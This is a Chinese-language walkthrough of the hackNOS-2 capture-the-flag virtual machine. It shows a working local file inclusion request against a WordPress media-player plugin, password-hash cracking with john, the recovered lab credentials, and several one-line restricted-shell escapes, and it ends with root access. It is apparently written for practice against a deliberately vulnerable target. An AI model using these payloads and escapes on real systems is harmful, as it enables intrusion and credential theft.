os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

一、信息收集

  直接netdiscover,找到IP是 192.168.56.101 然后端口扫描一波 只打开了22和80端口,访问一下80端口,是apache首页,那就继续查目录赛.,发现了一个tsweb,应该是wordpress的

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

打开是wp5.3的

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

然后扫描全部 插件,发现 gracemedia-media-player 1.0 ,在exploit-db中搜索发现存在本地文件包含漏洞 急吧用没得

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

得到POC

/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

是可以读取到本地文件的,这边看到有md5值,后面就难得做了 CNMD!  受不了了还是做吧

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

这儿得到2个账号 flag和rohit,而且可以知道flag账户是rbash,rohit是直接/bin/bash,不要问我怎么看出来的,,,拿到mds值就去解密啊 首先将md5值新建到一个文件中命名为hash,

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

然后使用john 来破解

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash
john --show --format=md5crypt-long hash

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

这是时候我们就得到了一个账号 flag 密码 topsecret ssh连接呗

ssh flag@192.168.56.101

连接过后,发现有是rbash,受限制的shell   比如CD命令不行,

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

后面经过测试,发现python 可以执行,我们直接用python来写入bash, 成功绕过

python -c 'import os; os.system("/bin/bash")'
以下都是可以绕过的
ssh username@IP -t "bash --noprofile"

perl -e 'exec "/bin/sh";'
awk 'BEGIN {system("/bin/bash")}'

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

后面找了很久找到了在/var/backups/passbkp 目录下找到了另一个账号的hash,,采取同样的方式破解

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

得到账号是

账号:rohit
密码:!%hack41

成功切换到 rohit账户,(我直接su rohit 输入密码 !的时候自动换行导致密码错误,只好重新ssh连接)

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

成功得到我们第一个flag

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

切换到root账户拿到第二个flag

os-hackNOS-2(wp5.3本地文件包含 rbash绕过)

上一篇:JavaScript的=、==和===


下一篇:Xamarin.Forms 简介